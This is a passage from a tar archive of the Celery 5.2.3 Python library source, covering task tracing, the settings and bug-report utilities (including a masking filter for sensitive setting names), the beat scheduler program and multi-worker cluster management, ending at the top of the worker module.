group): groups.append(sig) else: sigs.append(sig) for group_ in groups: group_.apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) if sigs: group(sigs, app=app).apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) else: signature(callbacks[0], app=app).apply_async( (retval,), parent_id=uuid, root_id=root_id, priority=task_priority ) # execute first task in chain chain = task_request.chain if chain: _chsig = signature(chain.pop(), app=app) _chsig.apply_async( (retval,), chain=chain, parent_id=uuid, root_id=root_id, priority=task_priority ) task.backend.mark_as_done( uuid, retval, task_request, publish_result, ) except EncodeError as exc: I, R, state, retval = on_error(task_request, exc, uuid) else: Rstr = saferepr(R, resultrepr_maxsize) T = monotonic() - time_start if task_on_success: task_on_success(retval, uuid, args, kwargs) if success_receivers: send_success(sender=task, result=retval) if _does_info: info(LOG_SUCCESS, { 'id': uuid, 'name': get_task_name(task_request, name), 'return_value': Rstr, 'runtime': T, 'args': safe_repr(args), 'kwargs': safe_repr(kwargs), }) # -* POST *- if state not in IGNORE_STATES: if task_after_return: task_after_return( state, retval, uuid, args, kwargs, None, ) finally: try: if postrun_receivers: send_postrun(sender=task, task_id=uuid, task=task, args=args, kwargs=kwargs, retval=retval, state=state) finally: pop_task() pop_request() if not eager: try: task.backend.process_cleanup() loader_cleanup() except (KeyboardInterrupt, SystemExit, MemoryError): raise except Exception as exc: logger.error('Process cleanup failed: %r', exc, exc_info=True) except MemoryError: raise except Exception as exc: _signal_internal_error(task, uuid, args, kwargs, request, exc) if eager: raise R = report_internal_error(task, exc) if task_request is not None: I, _, _, _ = on_error(task_request, exc, uuid) return trace_ok_t(R, I, T, Rstr) return trace_task def trace_task(task, uuid, args, kwargs, request=None, **opts): """Trace task execution.""" request = {} if not request else request try: if task.__trace__ is None: task.__trace__ = build_tracer(task.name, task, **opts) return task.__trace__(uuid, args, kwargs, request) except Exception as exc: _signal_internal_error(task, uuid, args, kwargs, request, exc) return trace_ok_t(report_internal_error(task, exc), TraceInfo(FAILURE, exc), 0.0, None) def _signal_internal_error(task, uuid, args, kwargs, request, exc): """Send a special `internal_error` signal to the app for outside body errors.""" try: _, _, tb = sys.exc_info() einfo = ExceptionInfo() einfo.exception = get_pickleable_exception(einfo.exception) einfo.type = get_pickleable_etype(einfo.type) signals.task_internal_error.send( sender=task, task_id=uuid, args=args, kwargs=kwargs, request=request, exception=exc, traceback=tb, einfo=einfo, ) finally: del tb def trace_task_ret(name, uuid, request, body, content_type, content_encoding, loads=loads_message, app=None, **extra_request): app = app or current_app._get_current_object() embed = None if content_type: accept = prepare_accept_content(app.conf.accept_content) args, kwargs, embed = loads( body, content_type, content_encoding, accept=accept, ) else: args, kwargs, embed = body hostname = gethostname() request.update({ 'args': args, 'kwargs': kwargs, 'hostname': hostname, 'is_eager': False, }, **embed or {}) R, I, T, Rstr = trace_task(app.tasks[name], uuid, args, kwargs, request, app=app) return (1, R, T) if I else (0, Rstr, T) def fast_trace_task(task, uuid, request, body, content_type, content_encoding, loads=loads_message, _loc=None, hostname=None, **_): _loc = _localized if not _loc else _loc embed = None tasks, accept, hostname = _loc if content_type: args, kwargs, embed = loads( body, content_type, content_encoding, accept=accept, ) else: args, kwargs, embed = body request.update({ 'args': args, 'kwargs': kwargs, 'hostname': hostname, 'is_eager': False, }, **embed or {}) R, I, T, Rstr = tasks[task].__trace__( uuid, args, kwargs, request, ) return (1, R, T) if I else (0, Rstr, T) def report_internal_error(task, exc): _type, _value, _tb = sys.exc_info() try: _value = task.backend.prepare_exception(exc, 'pickle') exc_info = ExceptionInfo((_type, _value, _tb), internal=True) warn(RuntimeWarning( 'Exception raised outside body: {!r}:\n{}'.format( exc, exc_info.traceback))) return exc_info finally: del _tb def setup_worker_optimizations(app, hostname=None): """Setup worker related optimizations.""" hostname = hostname or gethostname() # make sure custom Task.__call__ methods that calls super # won't mess up the request/task stack. _install_stack_protection() # all new threads start without a current app, so if an app is not # passed on to the thread it will fall back to the "default app", # which then could be the wrong app. So for the worker # we set this to always return our app. This is a hack, # and means that only a single app can be used for workers # running in the same process. app.set_current() app.set_default() # evaluate all task classes by finalizing the app. app.finalize() # set fast shortcut to task registry _localized[:] = [ app._tasks, prepare_accept_content(app.conf.accept_content), hostname, ] app.use_fast_trace_task = True def reset_worker_optimizations(app=current_app): """Reset previously configured optimizations.""" try: delattr(BaseTask, '_stackprotected') except AttributeError: pass try: BaseTask.__call__ = _patched.pop('BaseTask.__call__') except KeyError: pass app.use_fast_trace_task = False def _install_stack_protection(): # Patches BaseTask.__call__ in the worker to handle the edge case # where people override it and also call super. # # - The worker optimizes away BaseTask.__call__ and instead # calls task.run directly. # - so with the addition of current_task and the request stack # BaseTask.__call__ now pushes to those stacks so that # they work when tasks are called directly. # # The worker only optimizes away __call__ in the case # where it hasn't been overridden, so the request/task stack # will blow if a custom task class defines __call__ and also # calls super(). if not getattr(BaseTask, '_stackprotected', False): _patched['BaseTask.__call__'] = orig = BaseTask.__call__ def __protected_call__(self, *args, **kwargs): stack = self.request_stack req = stack.top if req and not req._protected and \ len(stack) == 1 and not req.called_directly: req._protected = 1 return self.run(*args, **kwargs) return orig(self, *args, **kwargs) BaseTask.__call__ = __protected_call__ BaseTask._stackprotected = True ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/utils.py0000664000175000017500000003160100000000000016453 0ustar00asifasif00000000000000"""App utilities: Compat settings, bug-report tool, pickling apps.""" import os import platform as _platform import re from collections import namedtuple from collections.abc import Mapping from copy import deepcopy from types import ModuleType from kombu.utils.url import maybe_sanitize_url from celery.exceptions import ImproperlyConfigured from celery.platforms import pyimplementation from celery.utils.collections import ConfigurationView from celery.utils.imports import import_from_cwd, qualname, symbol_by_name from celery.utils.text import pretty from .defaults import (_OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, SETTING_KEYS, find) __all__ = ( 'Settings', 'appstr', 'bugreport', 'filter_hidden_settings', 'find_app', ) #: Format used to generate bug-report information. BUGREPORT_INFO = """ software -> celery:{celery_v} kombu:{kombu_v} py:{py_v} billiard:{billiard_v} {driver_v} platform -> system:{system} arch:{arch} kernel version:{kernel_version} imp:{py_i} loader -> {loader} settings -> transport:{transport} results:{results} {human_settings} """ HIDDEN_SETTINGS = re.compile( 'API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE|DATABASE', re.IGNORECASE, ) E_MIX_OLD_INTO_NEW = """ Cannot mix new and old setting keys, please rename the following settings to the new format: {renames} """ E_MIX_NEW_INTO_OLD = """ Cannot mix new setting names with old setting names, please rename the following settings to use the old format: {renames} Or change all of the settings to use the new format :) """ FMT_REPLACE_SETTING = '{replace:<36} -> {with_}' def appstr(app): """String used in __repr__ etc, to id app instances.""" return f'{app.main or "__main__"} at {id(app):#x}' class Settings(ConfigurationView): """Celery settings object. .. seealso: :ref:`configuration` for a full list of configuration keys. """ def __init__(self, *args, deprecated_settings=None, **kwargs): super().__init__(*args, **kwargs) self.deprecated_settings = deprecated_settings @property def broker_read_url(self): return ( os.environ.get('CELERY_BROKER_READ_URL') or self.get('broker_read_url') or self.broker_url ) @property def broker_write_url(self): return ( os.environ.get('CELERY_BROKER_WRITE_URL') or self.get('broker_write_url') or self.broker_url ) @property def broker_url(self): return ( os.environ.get('CELERY_BROKER_URL') or self.first('broker_url', 'broker_host') ) @property def result_backend(self): return ( os.environ.get('CELERY_RESULT_BACKEND') or self.first('result_backend', 'CELERY_RESULT_BACKEND') ) @property def task_default_exchange(self): return self.first( 'task_default_exchange', 'task_default_queue', ) @property def task_default_routing_key(self): return self.first( 'task_default_routing_key', 'task_default_queue', ) @property def timezone(self): # this way we also support django's time zone. return self.first('timezone', 'time_zone') def without_defaults(self): """Return the current configuration, but without defaults.""" # the last stash is the default settings, so just skip that return Settings({}, self.maps[:-1]) def value_set_for(self, key): return key in self.without_defaults() def find_option(self, name, namespace=''): """Search for option by name. Example: >>> from proj.celery import app >>> app.conf.find_option('disable_rate_limits') ('worker', 'prefetch_multiplier', bool default->False>)) Arguments: name (str): Name of option, cannot be partial. namespace (str): Preferred name-space (``None`` by default). Returns: Tuple: of ``(namespace, key, type)``. """ return find(name, namespace) def find_value_for_key(self, name, namespace='celery'): """Shortcut to ``get_by_parts(*find_option(name)[:-1])``.""" return self.get_by_parts(*self.find_option(name, namespace)[:-1]) def get_by_parts(self, *parts): """Return the current value for setting specified as a path. Example: >>> from proj.celery import app >>> app.conf.get_by_parts('worker', 'disable_rate_limits') False """ return self['_'.join(part for part in parts if part)] def finalize(self): # See PendingConfiguration in celery/app/base.py # first access will read actual configuration. try: self['__bogus__'] except KeyError: pass return self def table(self, with_defaults=False, censored=True): filt = filter_hidden_settings if censored else lambda v: v dict_members = dir(dict) self.finalize() settings = self if with_defaults else self.without_defaults() return filt({ k: v for k, v in settings.items() if not k.startswith('_') and k not in dict_members }) def humanize(self, with_defaults=False, censored=True): """Return a human readable text showing configuration changes.""" return '\n'.join( f'{key}: {pretty(value, width=50)}' for key, value in self.table(with_defaults, censored).items()) def maybe_warn_deprecated_settings(self): # TODO: Remove this method in Celery 6.0 if self.deprecated_settings: from celery.app.defaults import _TO_NEW_KEY from celery.utils import deprecated for setting in self.deprecated_settings: deprecated.warn(description=f'The {setting!r} setting', removal='6.0.0', alternative=f'Use the {_TO_NEW_KEY[setting]} instead') return True return False def _new_key_to_old(key, convert=_TO_OLD_KEY.get): return convert(key, key) def _old_key_to_new(key, convert=_TO_NEW_KEY.get): return convert(key, key) _settings_info_t = namedtuple('settings_info_t', ( 'defaults', 'convert', 'key_t', 'mix_error', )) _settings_info = _settings_info_t( DEFAULTS, _TO_NEW_KEY, _old_key_to_new, E_MIX_OLD_INTO_NEW, ) _old_settings_info = _settings_info_t( _OLD_DEFAULTS, _TO_OLD_KEY, _new_key_to_old, E_MIX_NEW_INTO_OLD, ) def detect_settings(conf, preconf=None, ignore_keys=None, prefix=None, all_keys=None, old_keys=None): preconf = {} if not preconf else preconf ignore_keys = set() if not ignore_keys else ignore_keys all_keys = SETTING_KEYS if not all_keys else all_keys old_keys = _OLD_SETTING_KEYS if not old_keys else old_keys source = conf if conf is None: source, conf = preconf, {} have = set(source.keys()) - ignore_keys is_in_new = have.intersection(all_keys) is_in_old = have.intersection(old_keys) info = None if is_in_new: # have new setting names info, left = _settings_info, is_in_old if is_in_old and len(is_in_old) > len(is_in_new): # Majority of the settings are old. info, left = _old_settings_info, is_in_new if is_in_old: # have old setting names, or a majority of the names are old. if not info: info, left = _old_settings_info, is_in_new if is_in_new and len(is_in_new) > len(is_in_old): # Majority of the settings are new info, left = _settings_info, is_in_old else: # no settings, just use new format. info, left = _settings_info, is_in_old if prefix: # always use new format if prefix is used. info, left = _settings_info, set() # only raise error for keys that the user didn't provide two keys # for (e.g., both ``result_expires`` and ``CELERY_TASK_RESULT_EXPIRES``). really_left = {key for key in left if info.convert[key] not in have} if really_left: # user is mixing old/new, or new/old settings, give renaming # suggestions. raise ImproperlyConfigured(info.mix_error.format(renames='\n'.join( FMT_REPLACE_SETTING.format(replace=key, with_=info.convert[key]) for key in sorted(really_left) ))) preconf = {info.convert.get(k, k): v for k, v in preconf.items()} defaults = dict(deepcopy(info.defaults), **preconf) return Settings( preconf, [conf, defaults], (_old_key_to_new, _new_key_to_old), deprecated_settings=is_in_old, prefix=prefix, ) class AppPickler: """Old application pickler/unpickler (< 3.1).""" def __call__(self, cls, *args): kwargs = self.build_kwargs(*args) app = self.construct(cls, **kwargs) self.prepare(app, **kwargs) return app def prepare(self, app, **kwargs): app.conf.update(kwargs['changes']) def build_kwargs(self, *args): return self.build_standard_kwargs(*args) def build_standard_kwargs(self, main, changes, loader, backend, amqp, events, log, control, accept_magic_kwargs, config_source=None): return {'main': main, 'loader': loader, 'backend': backend, 'amqp': amqp, 'changes': changes, 'events': events, 'log': log, 'control': control, 'set_as_current': False, 'config_source': config_source} def construct(self, cls, **kwargs): return cls(**kwargs) def _unpickle_app(cls, pickler, *args): """Rebuild app for versions 2.5+.""" return pickler()(cls, *args) def _unpickle_app_v2(cls, kwargs): """Rebuild app for versions 3.1+.""" kwargs['set_as_current'] = False return cls(**kwargs) def filter_hidden_settings(conf): """Filter sensitive settings.""" def maybe_censor(key, value, mask='*' * 8): if isinstance(value, Mapping): return filter_hidden_settings(value) if isinstance(key, str): if HIDDEN_SETTINGS.search(key): return mask elif 'broker_url' in key.lower(): from kombu import Connection return Connection(value).as_uri(mask=mask) elif 'backend' in key.lower(): return maybe_sanitize_url(value, mask=mask) return value return {k: maybe_censor(k, v) for k, v in conf.items()} def bugreport(app): """Return a string containing information useful in bug-reports.""" import billiard import kombu import celery try: conn = app.connection() driver_v = '{}:{}'.format(conn.transport.driver_name, conn.transport.driver_version()) transport = conn.transport_cls except Exception: # pylint: disable=broad-except transport = driver_v = '' return BUGREPORT_INFO.format( system=_platform.system(), arch=', '.join(x for x in _platform.architecture() if x), kernel_version=_platform.release(), py_i=pyimplementation(), celery_v=celery.VERSION_BANNER, kombu_v=kombu.__version__, billiard_v=billiard.__version__, py_v=_platform.python_version(), driver_v=driver_v, transport=transport, results=maybe_sanitize_url(app.conf.result_backend or 'disabled'), human_settings=app.conf.humanize(), loader=qualname(app.loader.__class__), ) def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd): """Find app by name.""" from .base import Celery try: sym = symbol_by_name(app, imp=imp) except AttributeError: # last part was not an attribute, but a module sym = imp(app) if isinstance(sym, ModuleType) and ':' not in app: try: found = sym.app if isinstance(found, ModuleType): raise AttributeError() except AttributeError: try: found = sym.celery if isinstance(found, ModuleType): raise AttributeError( "attribute 'celery' is the celery module not the instance of celery") except AttributeError: if getattr(sym, '__path__', None): try: return find_app( f'{app}.celery', symbol_by_name=symbol_by_name, imp=imp, ) except ImportError: pass for suspect in vars(sym).values(): if isinstance(suspect, Celery): return suspect raise else: return found else: return found return sym ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3797493 celery-5.2.3/celery/apps/0000775000175000017500000000000000000000000015123 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/__init__.py0000664000175000017500000000000000000000000017222 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/beat.py0000664000175000017500000001203100000000000016405 0ustar00asifasif00000000000000"""Beat command-line program. This module is the 'program-version' of :mod:`celery.beat`. It does everything necessary to run that module as an actual application, like installing signal handlers and so on. """ import numbers import socket import sys from datetime import datetime from celery import VERSION_BANNER, beat, platforms from celery.utils.imports import qualname from celery.utils.log import LOG_LEVELS, get_logger from celery.utils.time import humanize_seconds __all__ = ('Beat',) STARTUP_INFO_FMT = """ LocalTime -> {timestamp} Configuration -> . broker -> {conninfo} . loader -> {loader} . scheduler -> {scheduler} {scheduler_info} . logfile -> {logfile}@%{loglevel} . maxinterval -> {hmax_interval} ({max_interval}s) """.strip() logger = get_logger('celery.beat') class Beat: """Beat as a service.""" Service = beat.Service app = None def __init__(self, max_interval=None, app=None, socket_timeout=30, pidfile=None, no_color=None, loglevel='WARN', logfile=None, schedule=None, scheduler=None, scheduler_cls=None, # XXX use scheduler redirect_stdouts=None, redirect_stdouts_level=None, **kwargs): self.app = app = app or self.app either = self.app.either self.loglevel = loglevel self.logfile = logfile self.schedule = either('beat_schedule_filename', schedule) self.scheduler_cls = either( 'beat_scheduler', scheduler, scheduler_cls) self.redirect_stdouts = either( 'worker_redirect_stdouts', redirect_stdouts) self.redirect_stdouts_level = either( 'worker_redirect_stdouts_level', redirect_stdouts_level) self.max_interval = max_interval self.socket_timeout = socket_timeout self.no_color = no_color self.colored = app.log.colored( self.logfile, enabled=not no_color if no_color is not None else no_color, ) self.pidfile = pidfile if not isinstance(self.loglevel, numbers.Integral): self.loglevel = LOG_LEVELS[self.loglevel.upper()] def run(self): print(str(self.colored.cyan( f'celery beat v{VERSION_BANNER} is starting.'))) self.init_loader() self.set_process_title() self.start_scheduler() def setup_logging(self, colorize=None): if colorize is None and self.no_color is not None: colorize = not self.no_color self.app.log.setup(self.loglevel, self.logfile, self.redirect_stdouts, self.redirect_stdouts_level, colorize=colorize) def start_scheduler(self): if self.pidfile: platforms.create_pidlock(self.pidfile) service = self.Service( app=self.app, max_interval=self.max_interval, scheduler_cls=self.scheduler_cls, schedule_filename=self.schedule, ) print(self.banner(service)) self.setup_logging() if self.socket_timeout: logger.debug('Setting default socket timeout to %r', self.socket_timeout) socket.setdefaulttimeout(self.socket_timeout) try: self.install_sync_handler(service) service.start() except Exception as exc: logger.critical('beat raised exception %s: %r', exc.__class__, exc, exc_info=True) raise def banner(self, service): c = self.colored return str( c.blue('__ ', c.magenta('-'), c.blue(' ... __ '), c.magenta('-'), c.blue(' _\n'), c.reset(self.startup_info(service))), ) def init_loader(self): # Run the worker init handler. # (Usually imports task modules and such.) self.app.loader.init_worker() self.app.finalize() def startup_info(self, service): scheduler = service.get_scheduler(lazy=True) return STARTUP_INFO_FMT.format( conninfo=self.app.connection().as_uri(), timestamp=datetime.now().replace(microsecond=0), logfile=self.logfile or '[stderr]', loglevel=LOG_LEVELS[self.loglevel], loader=qualname(self.app.loader), scheduler=qualname(scheduler), scheduler_info=scheduler.info, hmax_interval=humanize_seconds(scheduler.max_interval), max_interval=scheduler.max_interval, ) def set_process_title(self): arg_start = 'manage' in sys.argv[0] and 2 or 1 platforms.set_process_title( 'celery beat', info=' '.join(sys.argv[arg_start:]), ) def install_sync_handler(self, service): """Install a `SIGTERM` + `SIGINT` handler saving the schedule.""" def _sync(signum, frame): service.sync() raise SystemExit() platforms.signals.update(SIGTERM=_sync, SIGINT=_sync) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/multi.py0000664000175000017500000004001600000000000016630 0ustar00asifasif00000000000000"""Start/stop/manage workers.""" import errno import os import shlex import signal import sys from collections import OrderedDict, UserList, defaultdict from functools import partial from subprocess import Popen from time import sleep from kombu.utils.encoding import from_utf8 from kombu.utils.objects import cached_property from celery.platforms import IS_WINDOWS, Pidfile, signal_name from celery.utils.nodenames import (gethostname, host_format, node_format, nodesplit) from celery.utils.saferepr import saferepr __all__ = ('Cluster', 'Node') CELERY_EXE = 'celery' def celery_exe(*args): return ' '.join((CELERY_EXE,) + args) def build_nodename(name, prefix, suffix): hostname = suffix if '@' in name: nodename = host_format(name) shortname, hostname = nodesplit(nodename) name = shortname else: shortname = f'{prefix}{name}' nodename = host_format( f'{shortname}@{hostname}', ) return name, nodename, hostname def build_expander(nodename, shortname, hostname): return partial( node_format, name=nodename, N=shortname, d=hostname, h=nodename, i='%i', I='%I', ) def format_opt(opt, value): if not value: return opt if opt.startswith('--'): return f'{opt}={value}' return f'{opt} {value}' def _kwargs_to_command_line(kwargs): return { ('--{}'.format(k.replace('_', '-')) if len(k) > 1 else f'-{k}'): f'{v}' for k, v in kwargs.items() } class NamespacedOptionParser: def __init__(self, args): self.args = args self.options = OrderedDict() self.values = [] self.passthrough = '' self.namespaces = defaultdict(lambda: OrderedDict()) def parse(self): rargs = [arg for arg in self.args if arg] pos = 0 while pos < len(rargs): arg = rargs[pos] if arg == '--': self.passthrough = ' '.join(rargs[pos:]) break elif arg[0] == '-': if arg[1] == '-': self.process_long_opt(arg[2:]) else: value = None if len(rargs) > pos + 1 and rargs[pos + 1][0] != '-': value = rargs[pos + 1] pos += 1 self.process_short_opt(arg[1:], value) else: self.values.append(arg) pos += 1 def process_long_opt(self, arg, value=None): if '=' in arg: arg, value = arg.split('=', 1) self.add_option(arg, value, short=False) def process_short_opt(self, arg, value=None): self.add_option(arg, value, short=True) def optmerge(self, ns, defaults=None): if defaults is None: defaults = self.options return OrderedDict(defaults, **self.namespaces[ns]) def add_option(self, name, value, short=False, ns=None): prefix = short and '-' or '--' dest = self.options if ':' in name: name, ns = name.split(':') dest = self.namespaces[ns] dest[prefix + name] = value class Node: """Represents a node in a cluster.""" def __init__(self, name, cmd=None, append=None, options=None, extra_args=None): self.name = name self.cmd = cmd or f"-m {celery_exe('worker', '--detach')}" self.append = append self.extra_args = extra_args or '' self.options = self._annotate_with_default_opts( options or OrderedDict()) self.expander = self._prepare_expander() self.argv = self._prepare_argv() self._pid = None def _annotate_with_default_opts(self, options): options['-n'] = self.name self._setdefaultopt(options, ['--pidfile', '-p'], '/var/run/celery/%n.pid') self._setdefaultopt(options, ['--logfile', '-f'], '/var/log/celery/%n%I.log') self._setdefaultopt(options, ['--executable'], sys.executable) return options def _setdefaultopt(self, d, alt, value): for opt in alt[1:]: try: return d[opt] except KeyError: pass value = d.setdefault(alt[0], os.path.normpath(value)) dir_path = os.path.dirname(value) if dir_path and not os.path.exists(dir_path): os.makedirs(dir_path) return value def _prepare_expander(self): shortname, hostname = self.name.split('@', 1) return build_expander( self.name, shortname, hostname) def _prepare_argv(self): cmd = self.expander(self.cmd).split(' ') i = cmd.index('celery') + 1 options = self.options.copy() for opt, value in self.options.items(): if opt in ( '-A', '--app', '-b', '--broker', '--result-backend', '--loader', '--config', '--workdir', '-C', '--no-color', '-q', '--quiet', ): cmd.insert(i, format_opt(opt, self.expander(value))) options.pop(opt) cmd = [' '.join(cmd)] argv = tuple( cmd + [format_opt(opt, self.expander(value)) for opt, value in options.items()] + [self.extra_args] ) if self.append: argv += (self.expander(self.append),) return argv def alive(self): return self.send(0) def send(self, sig, on_error=None): pid = self.pid if pid: try: os.kill(pid, sig) except OSError as exc: if exc.errno != errno.ESRCH: raise maybe_call(on_error, self) return False return True maybe_call(on_error, self) def start(self, env=None, **kwargs): return self._waitexec( self.argv, path=self.executable, env=env, **kwargs) def _waitexec(self, argv, path=sys.executable, env=None, on_spawn=None, on_signalled=None, on_failure=None): argstr = self.prepare_argv(argv, path) maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env) pipe = Popen(argstr, env=env) return self.handle_process_exit( pipe.wait(), on_signalled=on_signalled, on_failure=on_failure, ) def handle_process_exit(self, retcode, on_signalled=None, on_failure=None): if retcode < 0: maybe_call(on_signalled, self, -retcode) return -retcode elif retcode > 0: maybe_call(on_failure, self, retcode) return retcode def prepare_argv(self, argv, path): args = ' '.join([path] + list(argv)) return shlex.split(from_utf8(args), posix=not IS_WINDOWS) def getopt(self, *alt): for opt in alt: try: return self.options[opt] except KeyError: pass raise KeyError(alt[0]) def __repr__(self): return f'<{type(self).__name__}: {self.name}>' @cached_property def pidfile(self): return self.expander(self.getopt('--pidfile', '-p')) @cached_property def logfile(self): return self.expander(self.getopt('--logfile', '-f')) @property def pid(self): if self._pid is not None: return self._pid try: return Pidfile(self.pidfile).read_pid() except ValueError: pass @pid.setter def pid(self, value): self._pid = value @cached_property def executable(self): return self.options['--executable'] @cached_property def argv_with_executable(self): return (self.executable,) + self.argv @classmethod def from_kwargs(cls, name, **kwargs): return cls(name, options=_kwargs_to_command_line(kwargs)) def maybe_call(fun, *args, **kwargs): if fun is not None: fun(*args, **kwargs) class MultiParser: Node = Node def __init__(self, cmd='celery worker', append='', prefix='', suffix='', range_prefix='celery'): self.cmd = cmd self.append = append self.prefix = prefix self.suffix = suffix self.range_prefix = range_prefix def parse(self, p): names = p.values options = dict(p.options) ranges = len(names) == 1 prefix = self.prefix cmd = options.pop('--cmd', self.cmd) append = options.pop('--append', self.append) hostname = options.pop('--hostname', options.pop('-n', gethostname())) prefix = options.pop('--prefix', prefix) or '' suffix = options.pop('--suffix', self.suffix) or hostname suffix = '' if suffix in ('""', "''") else suffix range_prefix = options.pop('--range-prefix', '') or self.range_prefix if ranges: try: names, prefix = self._get_ranges(names), range_prefix except ValueError: pass self._update_ns_opts(p, names) self._update_ns_ranges(p, ranges) return ( self._node_from_options( p, name, prefix, suffix, cmd, append, options) for name in names ) def _node_from_options(self, p, name, prefix, suffix, cmd, append, options): namespace, nodename, _ = build_nodename(name, prefix, suffix) namespace = nodename if nodename in p.namespaces else namespace return Node(nodename, cmd, append, p.optmerge(namespace, options), p.passthrough) def _get_ranges(self, names): noderange = int(names[0]) return [str(n) for n in range(1, noderange + 1)] def _update_ns_opts(self, p, names): # Numbers in args always refers to the index in the list of names. # (e.g., `start foo bar baz -c:1` where 1 is foo, 2 is bar, and so on). for ns_name, ns_opts in list(p.namespaces.items()): if ns_name.isdigit(): ns_index = int(ns_name) - 1 if ns_index < 0: raise KeyError(f'Indexes start at 1 got: {ns_name!r}') try: p.namespaces[names[ns_index]].update(ns_opts) except IndexError: raise KeyError(f'No node at index {ns_name!r}') def _update_ns_ranges(self, p, ranges): for ns_name, ns_opts in list(p.namespaces.items()): if ',' in ns_name or (ranges and '-' in ns_name): for subns in self._parse_ns_range(ns_name, ranges): p.namespaces[subns].update(ns_opts) p.namespaces.pop(ns_name) def _parse_ns_range(self, ns, ranges=False): ret = [] for space in ',' in ns and ns.split(',') or [ns]: if ranges and '-' in space: start, stop = space.split('-') ret.extend( str(n) for n in range(int(start), int(stop) + 1) ) else: ret.append(space) return ret class Cluster(UserList): """Represent a cluster of workers.""" def __init__(self, nodes, cmd=None, env=None, on_stopping_preamble=None, on_send_signal=None, on_still_waiting_for=None, on_still_waiting_progress=None, on_still_waiting_end=None, on_node_start=None, on_node_restart=None, on_node_shutdown_ok=None, on_node_status=None, on_node_signal=None, on_node_signal_dead=None, on_node_down=None, on_child_spawn=None, on_child_signalled=None, on_child_failure=None): self.nodes = nodes self.cmd = cmd or celery_exe('worker') self.env = env self.on_stopping_preamble = on_stopping_preamble self.on_send_signal = on_send_signal self.on_still_waiting_for = on_still_waiting_for self.on_still_waiting_progress = on_still_waiting_progress self.on_still_waiting_end = on_still_waiting_end self.on_node_start = on_node_start self.on_node_restart = on_node_restart self.on_node_shutdown_ok = on_node_shutdown_ok self.on_node_status = on_node_status self.on_node_signal = on_node_signal self.on_node_signal_dead = on_node_signal_dead self.on_node_down = on_node_down self.on_child_spawn = on_child_spawn self.on_child_signalled = on_child_signalled self.on_child_failure = on_child_failure def start(self): return [self.start_node(node) for node in self] def start_node(self, node): maybe_call(self.on_node_start, node) retcode = self._start_node(node) maybe_call(self.on_node_status, node, retcode) return retcode def _start_node(self, node): return node.start( self.env, on_spawn=self.on_child_spawn, on_signalled=self.on_child_signalled, on_failure=self.on_child_failure, ) def send_all(self, sig): for node in self.getpids(on_down=self.on_node_down): maybe_call(self.on_node_signal, node, signal_name(sig)) node.send(sig, self.on_node_signal_dead) def kill(self): return self.send_all(signal.SIGKILL) def restart(self, sig=signal.SIGTERM): retvals = [] def restart_on_down(node): maybe_call(self.on_node_restart, node) retval = self._start_node(node) maybe_call(self.on_node_status, node, retval) retvals.append(retval) self._stop_nodes(retry=2, on_down=restart_on_down, sig=sig) return retvals def stop(self, retry=None, callback=None, sig=signal.SIGTERM): return self._stop_nodes(retry=retry, on_down=callback, sig=sig) def stopwait(self, retry=2, callback=None, sig=signal.SIGTERM): return self._stop_nodes(retry=retry, on_down=callback, sig=sig) def _stop_nodes(self, retry=None, on_down=None, sig=signal.SIGTERM): on_down = on_down if on_down is not None else self.on_node_down nodes = list(self.getpids(on_down=on_down)) if nodes: for node in self.shutdown_nodes(nodes, sig=sig, retry=retry): maybe_call(on_down, node) def shutdown_nodes(self, nodes, sig=signal.SIGTERM, retry=None): P = set(nodes) maybe_call(self.on_stopping_preamble, nodes) to_remove = set() for node in P: maybe_call(self.on_send_signal, node, signal_name(sig)) if not node.send(sig, self.on_node_signal_dead): to_remove.add(node) yield node P -= to_remove if retry: maybe_call(self.on_still_waiting_for, P) its = 0 while P: to_remove = set() for node in P: its += 1 maybe_call(self.on_still_waiting_progress, P) if not node.alive(): maybe_call(self.on_node_shutdown_ok, node) to_remove.add(node) yield node maybe_call(self.on_still_waiting_for, P) break P -= to_remove if P and not its % len(P): sleep(float(retry)) maybe_call(self.on_still_waiting_end) def find(self, name): for node in self: if node.name == name: return node raise KeyError(name) def getpids(self, on_down=None): for node in self: if node.pid: yield node else: maybe_call(on_down, node) def __repr__(self): return '<{name}({0}): {1}>'.format( len(self), saferepr([n.name for n in self]), name=type(self).__name__, ) @property def data(self): return self.nodes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/apps/worker.py0000664000175000017500000003222700000000000017014 0ustar00asifasif00000000000000"""Worker command-line program. This module is the 'program-version' of :mod:`celery.worker`. It does everything necessary to run that module as an actual application, like installing signal handlers, platform tweaks, and so on. """ import logging import os import platform as _platform import sys from datetime import datetime from functools import partial from billiard.common import REMAP_SIGTERM from billiard.process import current_process from kombu.utils.encoding import safe_str from celery import VERSION_BANNER, platforms, signals from celery.app import trace from celery.exceptions import WorkerShutdown, WorkerTerminate from celery.loaders.app import AppLoader from celery.platforms import EX_FAILURE, EX_OK, check_privileges, isatty from celery.utils import static, term from celery.utils.debug import cry from celery.utils.imports import qualname from celery.utils.log import get_logger, in_sighandler, set_in_sighandler from celery.utils.text import pluralize from celery.worker import WorkController __all__ = ('Worker',) logger = get_logger(__name__) is_jython = sys.platform.startswith('java') is_pypy = hasattr(sys, 'pypy_version_info') ARTLINES = [ ' --------------', '--- ***** -----', '-- ******* ----', '- *** --- * ---', '- ** ----------', '- ** ----------', '- ** ----------', '- ** ----------', '- *** --- * ---', '-- ******* ----', '--- ***** -----', ' --------------', ] BANNER = """\ {hostname} v{version} {platform} {timestamp} [config] .> app: {app} .> transport: {conninfo} .> results: {results} .> concurrency: {concurrency} .> task events: {events} [queues] {queues} """ 